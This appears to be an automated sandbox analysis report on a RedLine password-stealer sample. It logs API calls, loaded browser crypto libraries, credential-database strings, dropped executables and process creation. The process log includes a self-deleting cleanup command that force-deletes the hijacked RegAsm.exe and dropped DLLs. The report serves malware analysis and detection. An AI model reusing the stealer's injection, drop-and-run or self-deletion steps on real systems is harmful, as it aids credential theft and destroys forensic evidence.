Code function: 3_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

3_2_00410AA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411020

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\ProgramData\CAFIJKFHIJ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: AKECBFBAEBKJJJJKFCGC.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdbSHA256@ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdbSHA256$ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdbSHA256 source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\ProgramData\CAFIJKFHIJ.exe

